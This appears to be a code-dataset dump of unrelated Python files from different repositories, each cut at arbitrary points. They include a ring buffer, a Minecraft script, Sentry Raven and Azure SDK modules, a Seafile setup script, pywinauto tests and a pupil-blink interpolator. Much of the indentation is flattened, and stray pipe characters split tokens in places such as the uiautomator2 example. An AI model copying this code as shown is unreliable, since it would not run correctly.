recording = kwargs.get('recording', True)
N = int(kwargs.get('N', 100))
logger = kwargs.get('logger', 'RingBuffer')
roi = kwargs.get('roi', [10, 100, 10, 100])
assert isinstance(directory, (str, unicode))
assert isinstance(filename, (str, unicode))
assert isinstance(recording, (int, bool))
assert isinstance(logger, (str, unicode))
assert isinstance(roi, (list, tuple, np.ndarray))
self.recording = recording
self.N = N
self.logger = logging.getLogger(logger)
self.roi = roi
self._index = 0
# Initialize HDF5 database.
self.filename = os.path.join(directory, filename)
        self._db = tables.open_file(self.filename, 'w', title="Ring Buffer")
self._db.create_group('/', 'images', 'Buffered Images')
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
self.close()
def close(self):
self._db.close()
def get_current_index(self):
"""Return the current index. This is in a function to
hopefully prevent the user from accessing _index directly
which could lead to bad things if it is modified!
"""
return self._index
def set_recording_state(self, state):
"""Explicitly set the recording state to state."""
assert isinstance(state, (bool, int))
self.recording = state
def toggle(self):
"""Toggle the recording state."""
self.recording = not self.recording
def write(self, data):
"""Write data to the ring buffer file."""
if not self.recording:
return
name = 'img{:04d}'.format(self._index)
try:
self._db.get_node('/images/' + name).remove()
except tables.NoSuchNodeError:
pass
finally:
# TODO: Adapt to CArray for compression
#filters = tables.Filters(complevel=5, complib='zlib')
arr = self._db.create_array('/images', name, data)
arr.attrs.timestamp = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S.%f')
arr.attrs.roi = self.roi
arr.flush()
self._db.flush()
self._index = self._index + 1 if self._index < self.N - 1 else 0
def read(self, index):
"""Return data from the ring buffer file."""
img = self._db.get_node('/images/img{:04d}'.format(index))
return np.array(img)
def get_roi(self, index):
"""Return the recorded ROI for the given index."""
return self._db.get_node('/images/img{:04d}'.format(index)).attrs.roi
def save_as(self, filename):
"""Save the ring buffer to file filename. The output format
will depend on the extension of filename.
"""
self.logger.warning("Saving ring buffers to non-HDF5 formats is not yet properly implemented!")
# Save as PNG files in a zip archive.
if filename[-3:] == 'zip':
for node in self._db.list_nodes('/images'):
data = node.read()
imsave('./img.png', data)
if __name__ == "__main__":
from numpy import random
size = 512
img_size = (size, size)
with RingBuffer(N=100) as rb:
for i in range(200):
img = random.random(img_size)
rb.write(img)
rb.save_as('test.zip')
craigem/MyAdventures | buildHouse2.py | Python | gpl-3.0 | 1,494 | 0 |
# Build a simple house.
# Import necessary modules.
import mcpi.minecraft as minecraft
import mcpi.block as block
# Connect to Minecraft.
mc = minecraft.Minecraft.create()
# Set a base size for the house.
SIZE = 20
# Create the house function.
def house():
# Calculate the midpoints, used to position doors and windows.
midx = x + SIZE / 2
midy = y + SIZE / 2
# Build the outer shell.
mc.setBlocks(
x, y, z,
x + SIZE, y + SIZE, z + SIZE,
block.COBBLESTONE.id
)
# Carve out the inside of the house.
mc.setBlocks(
        x + 1, y, z + 1,
x + SIZE - 2, y + SIZE - 1, z + SIZE - 2,
block.AIR.id
)
# Carve out the doorway.
mc.setBlocks(
midx - 1, y, z,
midx + 1, y + 3, z,
block.AIR.id
)
# Carve out two windows.
mc.setBlocks(
x + 3, y + SIZE - 3, z,
midx - 3, midy + 3, z,
block.GLASS.id
)
mc.setBlocks(
midx + 3, y + SIZE - 3, z,
x + SIZE - 3, midy + 3, z,
block.GLASS.id
)
# Add the roof
mc.setBlocks(
x, y + SIZE + 1, z,
x + SIZE, y + SIZE + 1, z + SIZE,
block.WOOD.id
)
# Add some carpet
mc.setBlocks(
x + 1, y - 1, z + 1,
x + SIZE - 2, y - 1, z + SIZE - 2,
block.WOOL.id, 14
)
# Get your position:
pos = mc.player.getTilePos()
# Store your coordinates.
x = pos.x + 2
y = pos.y
z = pos.z
house()
inspirehep/raven-python | raven/transport/registry.py | Python | bsd-3-clause | 2,913 | 0.00103 |
"""
raven.transport.registry
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import sys
# TODO(dcramer): we really should need to import all of these by default
from raven.transport.eventlet import EventletHTTPTransport
from raven.transport.exceptions import DuplicateScheme
from raven.transport.http import HTTPTransport
from raven.transport.gevent import GeventedHTTPTransport
from raven.transport.requests import RequestsHTTPTransport
from raven.transport.threaded import ThreadedHTTPTransport
from raven.transport.twisted import TwistedHTTPTransport
from raven.transport.tornado import TornadoHTTPTransport
from raven.transport.udp import UDPTransport
from raven.utils import urlparse
if sys.version_info >= (3, 3):
from raven.transport.aiohttp import AioHttpTransport
class TransportRegistry(object):
def __init__(self, transports=None):
# setup a default list of senders
self._schemes = {}
self._transports = {}
if transports:
for transport in transports:
self.register_transport(transport)
def register_transport(self, transport):
if not hasattr(transport, 'scheme') or not hasattr(transport.scheme, '__iter__'):
            raise AttributeError('Transport %s must have a scheme list' % transport.__class__.__name__)
for scheme in transport.scheme:
self.register_scheme(scheme, transport)
def register_scheme(self, scheme, cls):
"""
It is possible to inject new schemes at runtime
"""
if scheme in self._schemes:
raise DuplicateScheme()
urlparse.register_scheme(scheme)
# TODO (vng): verify the interface of the new class
self._schemes[scheme] = cls
def supported_scheme(self, scheme):
return scheme in self._schemes
def get_transport(self, parsed_url, **options):
full_url = parsed_url.geturl()
if full_url not in self._transports:
# Remove the options from the parsed_url
parsed_url = urlparse.urlparse(full_url.split('?')[0])
self._transports[full_url] = self._schemes[parsed_url.scheme](parsed_url, **options)
return self._transports[full_url]
def compute_scope(self, url, scope):
"""
Compute a scope dictionary. This may be overridden by custom
transports
"""
transport = self._schemes[url.scheme](url)
return transport.compute_scope(url, scope)
default_transports = [
HTTPTransport,
ThreadedHTTPTransport,
GeventedHTTPTransport,
TwistedHTTPTransport,
RequestsHTTPTransport,
TornadoHTTPTransport,
UDPTransport,
EventletHTTPTransport,
]
if sys.version_info >= (3, 3):
default_transports += [AioHttpTransport]
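# Editor's sketch: how a registry is typically assembled from the defaults
# above; scheme support can then be queried before building a transport.
# Assumes UDPTransport declares the 'udp' scheme.
#
# registry = TransportRegistry(transports=default_transports)
# assert registry.supported_scheme('udp')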
nonZero/demos-python | src/examples/short/iteration/iterator_generator.py | Python | gpl-3.0 | 652 | 0.001534 |
#!/usr/bin/python2
'''
This is an example of how to build a simple generator
'''
def my_reverse(data):
    for index in range(len(data) - 1, -1, -1):
yield data[index]
for char in my_reverse('golf'):
print(char)
'''
Notice that 'my_reverse' is still recognized as a plain function and not
'generator' or something.
When you do use it on data, the return value is a 'generator'.
Compare this to Python's own 'reversed':
- it is built in, so its type is 'type'
- when you apply it to data, the returned object's type is 'reversed'.
'''
print(type(my_reverse))
print(type(my_reverse('golf')))
print(type(reversed))
print(type(reversed('golf')))
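'''
Editor's sketch: driving the generator by hand shows the iterator protocol
that the for loop above uses under the hood.
'''
g = my_reverse('ab')
print(next(g))  # 'b'
print(next(g))  # 'a'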
openatx/uiautomator2 | examples/multi-thread-example.py | Python | mit | 747 | 0.001339 |
# coding: utf-8
#
# The GIL limits Python multi-thread effectiveness.
# But it seems fine here, because these operations involve a lot of socket IO,
# so there seems to be no need to use multiprocessing.
#
import uiautomator2 as u2
import adbutils
import threading
from logzero import logger
def worker(d: u2.Device):
d.app_start("io.appium.android.apis", stop=True)
d(text="App
|
").wait
|
()
for el in d.xpath("@android:id/list").child("/android.widget.TextView").all():
logger.info("%s click %s", d.serial, el.text)
el.click()
d.press("back")
logger.info("%s DONE", d.serial)
for dev in adbutils.adb.device_list():
print("Dev:", dev)
d = u2.connect(dev.serial)
t = threading.Thread(target=worker, args=(d,))
t.start()
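# Editor's note (sketch): the loop above never joins its threads; keeping
# references allows waiting for every device to finish, e.g.:
#
# threads = [threading.Thread(target=worker, args=(u2.connect(d.serial),))
#            for d in adbutils.adb.device_list()]
# for t in threads:
#     t.start()
# for t in threads:
#     t.join()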
Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/locks/v2016_09_01/aio/operations/_management_locks_operations.py | Python | mit | 49,288 | 0.005011 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._management_locks_operations import build_create_or_update_at_resource_group_level_request, build_create_or_update_at_resource_level_request, build_create_or_update_at_subscription_level_request, build_create_or_update_by_scope_request, build_delete_at_resource_group_level_request, build_delete_at_resource_level_request, build_delete_at_subscription_level_request, build_delete_by_scope_request, build_get_at_resource_group_level_request, build_get_at_resource_level_request, build_get_at_subscription_level_request, build_get_by_scope_request, build_list_at_resource_group_level_request, build_list_at_resource_level_request, build_list_at_subscription_level_request, build_list_by_scope_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ManagementLocksOperations:
"""ManagementLocksOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.locks.v2016_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def create_or_update_at_resource_group_level(
self,
resource_group_name: str,
lock_name: str,
parameters: "_models.ManagementLockObject",
**kwargs: Any
) -> "_models.ManagementLockObject":
"""Creates or updates a management lock at the resource group level.
When you apply a lock at a parent scope, all child resources inherit the same lock. To create
management locks, you must have access to Microsoft.Authorization/\ * or
Microsoft.Authorization/locks/* actions. Of the built-in roles, only Owner and User Access
Administrator are granted those actions.
:param resource_group_name: The name of the resource group to lock.
:type resource_group_name: str
:param lock_name: The lock name. The lock name can be a maximum of 260 characters. It cannot
contain <, > %, &, :, \, ?, /, or any control characters.
:type lock_name: str
:param parameters: The management lock parameters.
:type parameters: ~azure.mgmt.resource.locks.v2016_09_01.models.ManagementLockObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagementLockObject, or the result of cls(response)
:rtype: ~azure.mgmt.resource.locks.v2016_09_01.models.ManagementLockObject
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagementLockObject"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagementLockObject')
request = build_create_or_update_at_resource_group_level_request(
resource_group_name=resource_group_name,
lock_name=lock_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_at_resource_group_level.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ManagementLockObject', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ManagementLockObject', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
        return deserialized
create_or_update_at_resource_group_level.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Authorization/locks/{lockName}'} # type: ignore
@distributed_trace_async
async def delete_at_resource_group_level(
self,
        resource_group_name: str,
lock_name: str,
**kwargs: Any
) -> None:
"""Deletes a management lock at the resource group level.
To delete management locks, you must have access to Microsoft.Authorization/\ * or
Microsoft.Authorization/locks/* actions. Of the built-in roles, only Owner and User Access
Administrator are granted those actions.
:param resource_group_name: The name of the resource group containing the lock.
:type resource_group_name: str
:param lock_name: The name of lock to delete.
:type lock_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_at_resource_group_level_request(
resource_group_name=resource_group_name,
lock_name=lock_name,
subscription_id=self._config.subscription_id,
template_url=self.delete_at_resource_group_level.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
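# Editor's sketch (not generated code): typical async usage of the operations
# above. Client construction is an assumption for illustration; check the
# package docs for the exact import paths.
#
# from azure.identity.aio import DefaultAzureCredential
# from azure.mgmt.resource.locks.v2016_09_01.aio import ManagementLockClient
#
# async with ManagementLockClient(DefaultAzureCredential(), subscription_id) as client:
#     lock = await client.management_locks.create_or_update_at_resource_group_level(
#         'my-rg', 'my-lock', {'level': 'CanNotDelete'})
#     await client.management_locks.delete_at_resource_group_level('my-rg', 'my-lock')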
Chilledheart/seafile | scripts/setup-seafile-mysql.py | Python | gpl-3.0 | 43,261 | 0.002104 |
#coding: UTF-8
'''This script guides the seafile admin through setting up seafile with MySQL'''
import sys
import os
import time
import re
import shutil
import glob
import subprocess
import hashlib
import getpass
import uuid
import warnings
import MySQLdb
from ConfigParser import ConfigParser
try:
import readline # pylint: disable=W0611
except ImportError:
pass
SERVER_MANUAL_HTTP = 'https://github.com/haiwen/seafile/wiki'
class Utils(object):
'''Groups all helper functions here'''
@staticmethod
def welcome():
'''Show welcome message'''
welcome_msg = '''\
-----------------------------------------------------------------
This script will guide you to setup your seafile server using MySQL.
Make sure you have read seafile server manual at
%s
Press ENTER to continue
-----------------------------------------------------------------''' % SERVER_MANUAL_HTTP
print welcome_msg
raw_input()
@staticmethod
def highlight(content):
'''Add ANSI color to content to get it highlighted on terminal'''
return '\x1b[33m%s\x1b[m' % content
@staticmethod
def info(msg):
print msg
@staticmethod
def error(msg):
'''Print error and exit'''
print
print 'Error: ' + msg
sys.exit(1)
@staticmethod
def run_argv(argv, cwd=None, env=None, suppress_stdout=False, suppress_stderr=False):
        '''Run a program, wait for it to finish, and return its exit code. The
        standard output of this program is suppressed.
'''
with open(os.devnull, 'w') as devnull:
if suppress_stdout:
stdout = devnull
else:
stdout = sys.stdout
if suppress_stderr:
stderr = devnull
else:
stderr = sys.stderr
proc = subprocess.Popen(argv,
cwd=cwd,
stdout=stdout,
stderr=stderr,
env=env)
return proc.wait()
@staticmethod
def run(cmdline, cwd=None, env=None, suppress_stdout=False, suppress_stderr=False):
'''Like run_argv but specify a command line string instead of argv'''
with open(os.devnull, 'w') as devnull:
if suppress_stdout:
stdout = devnull
else:
stdout = sys.stdout
if suppress_stderr:
stderr = devnull
else:
stderr = sys.stderr
proc = subprocess.Popen(cmdline,
cwd=cwd,
stdout=stdout,
stderr=stderr,
env=env,
shell=True)
return proc.wait()
@staticmethod
def prepend_env_value(name, value, env=None, seperator=':'):
'''prepend a new value to a list'''
if env is None:
env = os.environ
try:
current_value = env[name]
except KeyError:
current_value = ''
new_value = value
if current_value:
new_value += seperator + current_value
env[name] = new_value
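    # Editor's sketch: prepending to PATH-style variables, e.g.
    #   Utils.prepend_env_value('PATH', '/opt/seafile/bin')
    # leaves os.environ['PATH'] == '/opt/seafile/bin' + ':' + its old value.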
@staticmethod
def must_mkdir(path):
'''Create a directory, exit on failure'''
try:
os.mkdir(path)
except OSError, e:
Utils.error('failed to create directory %s:%s' % (path, e))
@staticmethod
def must_copy(src, dst):
'''Copy src to dst, exit on failure'''
try:
shutil.copy(src, dst)
except Exception, e:
Utils.error('failed to copy %s to %s: %s' % (src, dst, e))
@staticmethod
def find_in_path(prog):
if 'win32' in sys.platform:
sep = ';'
else:
sep = ':'
dirs = os.environ['PATH'].split(sep)
for d in dirs:
d = d.strip()
if d == '':
continue
path = os.path.join(d, prog)
if os.path.exists(path):
return path
return None
@staticmethod
def get_python_executable():
'''Return the python executable. This should be the PYTHON environment
variable which is set in setup-seafile-mysql.sh
'''
return os.environ['PYTHON']
@staticmethod
def read_config(fn):
'''Return a case sensitive ConfigParser by reading the file "fn"'''
cp = ConfigParser()
cp.optionxform = str
cp.read(fn)
return cp
@staticmethod
def write_config(cp, fn):
        '''Write the ConfigParser object "cp" to the file "fn"'''
with open(fn, 'w') as fp:
cp.write(fp)
@staticmethod
def ask_question(desc,
key=None,
note=None,
default=None,
validate=None,
yes_or_no=False,
password=False):
'''Ask a question, return the answer.
@desc description, e.g. "What is the port of ccnet?"
@key a name to represent the target of the question, e.g. "port for
ccnet server"
@note additional information for the question, e.g. "Must be a valid
port number"
@default the default value of the question. If the default value is
not None, when the user enter nothing and press [ENTER], the default
value would be returned
@validate a function that takes the user input as the only parameter
and validate it. It should return a validated value, or throws an
"InvalidAnswer" exception if the input is not valid.
@yes_or_no If true, the user must answer "yes" or "no", and a boolean
value would be returned
@password If true, the user input would not be echoed to the
console
'''
assert key or yes_or_no
# Format description
print
if note:
desc += '\n' + note
desc += '\n'
if yes_or_no:
desc += '[ yes or no ]'
else:
if default:
desc += '[ default "%s" ]' % default
else:
desc += '[ %s ]' % key
desc += ' '
while True:
# prompt for user input
if password:
answer = getpass.getpass(desc).strip()
else:
answer = raw_input(desc).strip()
# No user input: use default
if not answer:
if default:
answer = default
else:
continue
# Have user input: validate answer
if yes_or_no:
if answer not in ['yes', 'no']:
print Utils.highlight('\nPlease answer yes or no\n')
continue
else:
return answer == 'yes'
else:
if validate:
try:
return validate(answer)
except InvalidAnswer, e:
print Utils.highlight('\n%s\n' % e)
continue
else:
return answer
@staticmethod
def validate_port(port):
try:
port = int(port)
except ValueError:
raise InvalidAnswer('%s is not a valid port' % Utils.highlight(port))
if port <= 0 or port > 65535:
raise InvalidAnswer('%s is not a valid port' % Utils.highlight(port))
return port
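def _demo_ask_port():
    # Editor's sketch (illustrative only; running it prompts interactively):
    # combining ask_question with validate_port, as a setup step might.
    return Utils.ask_question('What port should ccnet listen on?',
                              key='ccnet server port',
                              default='10001',
                              validate=Utils.validate_port)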
class InvalidAnswer(Exception):
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return self.msg
### END of Utils
####################
class EnvManager(object):
'''System environment and directory layout'''
def __init__(self):
self.install_path = os.path.dirname(os.path.abspath(__file__))
self.top_dir = os.path.dirname(self.install_path)
self.
acs-um/deptos | deptos/departamentos/urls.py | Python | apache-2.0 | 209 | 0.004785 |
from django.conf.urls import include, url
from .views import alquiler_nuevo, home
from django.contrib.auth.decorators import login_required
from departamentos.views import home, details
urlpatterns = [
]
airelil/pywinauto | pywinauto/unittests/test_uiawrapper.py | Python | bsd-3-clause | 89,050 | 0.002223 |
"""Tests for UIAWrapper"""
from __future__ import print_function
from __future__ import unicode_literals
import time
import os
import sys
import unittest
import mock
import six
sys.path.append(".")
from pywinauto.application import Application, WindowSpecification # noqa: E402
from pywinauto.sysinfo import is_x64_Python, UIA_support # noqa: E402
from pywinauto.timings import Timings # noqa: E402
from pywinauto.actionlogger import ActionLogger # noqa: E402
from pywinauto import Desktop
from pywinauto import mouse # noqa: E402
if UIA_support:
import comtypes
import pywinauto.uia_defines as uia_defs
import pywinauto.controls.uia_controls as uia_ctls
wpf_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\WPF_samples")
if is_x64_Python():
wpf_samples_folder = os.path.join(wpf_samples_folder, 'x64')
wpf_app_1 = os.path.join(wpf_samples_folder, u"WpfApplication1.exe")
mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
mfc_app_rebar_test = os.path.join(mfc_samples_folder, u"RebarTest.exe")
winforms_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\WinForms_samples")
if is_x64_Python():
winforms_folder = os.path.join(winforms_folder, 'x64')
winfoms_app_grid = os.path.join(winforms_folder, u"DataGridView_TestApp.exe")
if UIA_support:
def _set_timings():
"""Setup timings for UIA related tests"""
Timings.defaults()
Timings.window_find_timeout = 20
class UIAWrapperTests(unittest.TestCase):
"""Unit tests for the UIAWrapper class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
_set_timings()
mouse.move((-500, 500)) # remove the mouse from the screen to avoid side effects
# start the application
self.app = Application(backend='uia')
            self.app = self.app.start(wpf_app_1)
self.dlg = self.app.WPFSampleApplication
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
def test_issue_296(self):
"""Test handling of disappered descendants"""
wrp = self.dlg.wrapper_object()
orig = wrp.element_info._element.FindAll
wrp.element_info._element.FindAll = mock.Mock(side_effect=ValueError("Mocked value error"),
return_value=[]) # empty list
self.assertEqual([], wrp.descendants())
exception_err = comtypes.COMError(-2147220991, "Mocked COM error", ())
wrp.element_info._element.FindAll = mock.Mock(side_effect=exception_err,
return_value=[]) # empty list
self.assertEqual([], wrp.descendants())
wrp.element_info._element.FindAll = orig # restore the original method
def test_issue_278(self):
"""Test that statement menu = app.MainWindow.Menu works for 'uia' backend"""
menu_spec = self.dlg.Menu
self.assertTrue(isinstance(menu_spec, WindowSpecification))
def test_find_nontop_ctl_by_class_name_and_title(self):
"""Test getting a non-top control by a class name and a title"""
# Look up for a non-top button control with 'Apply' caption
self.dlg.wait('ready')
caption = 'Apply'
wins = self.app.windows(top_level_only=False,
class_name='Button',
title=caption)
# Verify the number of found wrappers
self.assertEqual(len(wins), 1)
# Verify the caption of the found wrapper
self.assertEqual(wins[0].texts()[0], caption)
def test_find_top_win_by_class_name_and_title(self):
"""Test getting a top window by a class name and a title"""
# Since the top_level_only is True by default
# we don't specify it as a criteria argument
self.dlg.wait('ready')
caption = 'WPF Sample Application'
wins = self.app.windows(class_name='Window', title=caption)
# Verify the number of found wrappers
self.assertEqual(len(wins), 1)
# Verify the caption of the found wrapper
self.assertEqual(wins[0].texts()[0], caption)
def test_class(self):
"""Test getting the classname of the dialog"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.class_name(), "Button")
def test_window_text(self):
"""Test getting the window Text of the dialog"""
label = self.dlg.TestLabel.wrapper_object()
self.assertEqual(label.window_text(), u"TestLabel")
self.assertEqual(label.can_be_label, True)
def test_control_id(self):
"""Test getting control ID"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.control_id(), None)
def test_runtime_id(self):
"""Test getting runtime ID"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertNotEqual(button.__hash__(), 0)
orig = button.element_info._element.GetRuntimeId
exception_err = comtypes.COMError(-2147220991, 'An event was unable to invoke any of the subscribers', ())
button.element_info._element.GetRuntimeId = mock.Mock(side_effect=exception_err)
self.assertEqual(button.__hash__(), 0)
button.element_info._element.GetRuntimeId = orig # restore the original method
def test_automation_id(self):
"""Test getting automation ID"""
alpha_toolbar = self.dlg.child_window(title="Alpha", control_type="ToolBar")
button = alpha_toolbar.child_window(control_type="Button",
auto_id="OverflowButton").wrapper_object()
self.assertEqual(button.automation_id(), "OverflowButton")
def test_is_visible(self):
"""Test is_visible method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.is_visible(), True)
def test_is_enabled(self):
"""Test is_enabled method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.is_enabled(), True)
def test_process_id(self):
"""Test process_id method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.process_id(), self.dlg.process_id())
self.assertNotEqual(button.process_id(), 0)
def test_is_dialog(self):
"""Test is_dialog method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.is_dialog(), False)
def test_parent(self):
"""Test getting a parent of a control"""
button = self.dlg.Alpha.wrapper_object()
self.assertEqual(button.parent(), self.dlg.wrapper_object())
def test_top_level_parent(self):
"""Test getting a top-level parent of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
            self.assertEqual(button.top_level_parent(), self.dlg.wrapper_object())
|
esdalmaijer/PyGazeAnalyser
|
pygazeanalyser/traces.py
|
Python
|
gpl-3.0
| 19,865 | 0.037352 |
# PyeNalysis
__author__ = "Edwin Dalmaijer"
import copy
import numpy
from scipy.interpolate import interp1d
# DEBUG #
#from matplotlib import pyplot
# # # # #
def interpolate_blink(signal, mode='auto', velthresh=5, maxdur=500, margin=10, invalid=-1, edfonly=False):
"""Returns signal with interpolated results, based on a cubic or linear
interpolation of all blinks detected in the signal; based on:
https://github.com/smathot/exparser/blob/master/exparser/TraceKit.py
arguments
signal -- a vector (i.e. a NumPy array) containing a single
trace of your signal; alternatively a trial gaze data
dict as is returned by edfreader can be passed; in this
case the blink ending events will be used to find blinks
before the pupil size velocity algorithm will be used
(NOTE: this means both will be used successively!)
keyword arguments
mode -- string indicating what kind of interpolation to use:
'linear' for a linear interpolation
'cubic' for a cubic interpolation
				'auto' for a cubic interpolation if possible (i.e.
when more than four data points are available)
and linear when this is not the case
(default = 'auto')
velthresh -- pupil size change velocity threshold in arbitrary
units per sample (default = 5)
maxdur -- maximal duration of the blink in samples
(default = 500)
margin -- margin (in samples) to compensate for blink duration
				underestimation; blink is extended for detected start
minus margin, and detected end plus margin
(default = 10)
	invalid	--	a single value coding for invalid data, e.g. -1
			or 0.0 (default = -1)
	edfonly	--	Boolean indicating whether blinks should ONLY be
			detected using the EDF logs and NOT algorithmically
			(default = False)
returns
signal -- a NumPy array containing the interpolated signal
"""
# # # # #
# input errors
# wrong interpolation method
if mode not in ['auto','linear','cubic']:
raise Exception("Error in pyenalysis.interpolate_missing: mode '%s' is not supported, please use one of the following: 'auto','linear','cubic'" % mode)
# wrong signal dimension
if type(signal) != dict:
if signal.ndim != 1:
raise Exception("Error in pyenalysis.interpolate_missing: input is not a single signal trace, but has %d dimensions; please provide a 1-dimension array" % signal.ndim)
# # # # #
# find blinks
# empty lists, to store blink starts and endings
starts = []
ends = []
# edfreader data
if type(signal) == dict:
# loop through blinks
for st, et, dur in signal['events']['Eblk']: # Eblk - list of lists, each containing [starttime, endtime, duration]
# edf time to sample number
st = numpy.where(signal['edftime']==st)[0]
			et = numpy.where(signal['edftime']==et)[0]
			# if the starting or ending time did not appear in the trial,
# correct the blink starting or ending point to the first or
# last sample, respectively
if len(st) == 0:
st = 0
else:
st = st[0]
if len(et) == 0:
et = len(signal['edftime'])
else:
et = et[0]
# compensate for underestimation of blink duration
if st-margin >= 0:
st -= margin
if et+margin < len(signal['size']):
et += margin
			# do not accept blinks that exceed maximal blink duration
if et-st <= maxdur:
# append start time and ending time
starts.append(st)
ends.append(et)
# extract pupil size data from signal
signal = signal['size']
if not edfonly:
# signal in NumPy array
# create a velocity profile of the signal
vprof = signal[1:]-signal[:-1]
# start detection
ifrom = 0
while True:
# blink onset is detected when pupil size change velocity exceeds
# threshold
l = numpy.where(vprof[ifrom:] < -velthresh)[0]
# break when no blink start is detected
if len(l) == 0:
break
# blink start index
istart = l[0]+ifrom
if ifrom == istart:
break
# reversal (opening of the eye) is detected when pupil size
# starts to increase with a super-threshold velocity
l = numpy.where(vprof[istart:] > velthresh)[0]
# if no reversal is detected, start detection process at istart
# next run
if len(l) == 0:
ifrom = istart
# reloop
continue
# index number of somewhat halfway blink process
imid = l[0] + istart
# a blink ending is detected when pupil size increase velocity
# falls back to zero
l = numpy.where(vprof[imid:] < 0)[0]
# if no ending is detected, start detection process from imid
# next run
if len(l) == 0:
ifrom = imid
# reloop
continue
# blink end index
iend = l[0]+imid
# start detection process from current blink ending next run
ifrom = iend
# compensate for underestimation of blink duration
if istart-margin >= 0:
istart -= margin
if iend+margin < len(signal):
iend += margin
			# do not accept blinks that exceed maximal blink duration
if iend-istart > maxdur:
# reloop
continue
# if all is well, we append start and ending to their respective
# lists
starts.append(istart)
ends.append(iend)
# # DEBUG #
# pyplot.figure()
# pyplot.title("" % ())
# pyplot.plot(signal,'ko')
# pyplot.plot(vprof,'b')
# # # # # #
# # # # #
# interpolate
# loop through all starting and ending positions
for i in range(len(starts)):
# empty list to store data points for interpolation
pl = []
# duration in samples
duration = ends[i]-starts[i]
# starting point
if starts[i] - duration >= 0:
pl.extend([starts[i]-duration])
# central points (data between these points will be replaced)
pl.extend([starts[i],ends[i]])
# ending point
if ends[i] + duration < len(signal):
pl.extend([ends[i]+duration])
# choose interpolation type
if mode == 'auto':
# if our range is wide enough, we can interpolate cubicly
if len(pl) >= 4:
kind = 'cubic'
# if not, we use a linear interpolation
else:
kind = 'linear'
else:
kind = mode[:]
# select values for interpolation function
x = numpy.array(pl)
y = signal[x]
# replace any invalid values with trial average
y[y==invalid] = numpy.mean(signal[signal!=invalid])
# create interpolation function
intfunc = interp1d(x,y,kind=kind)
# do interpolation
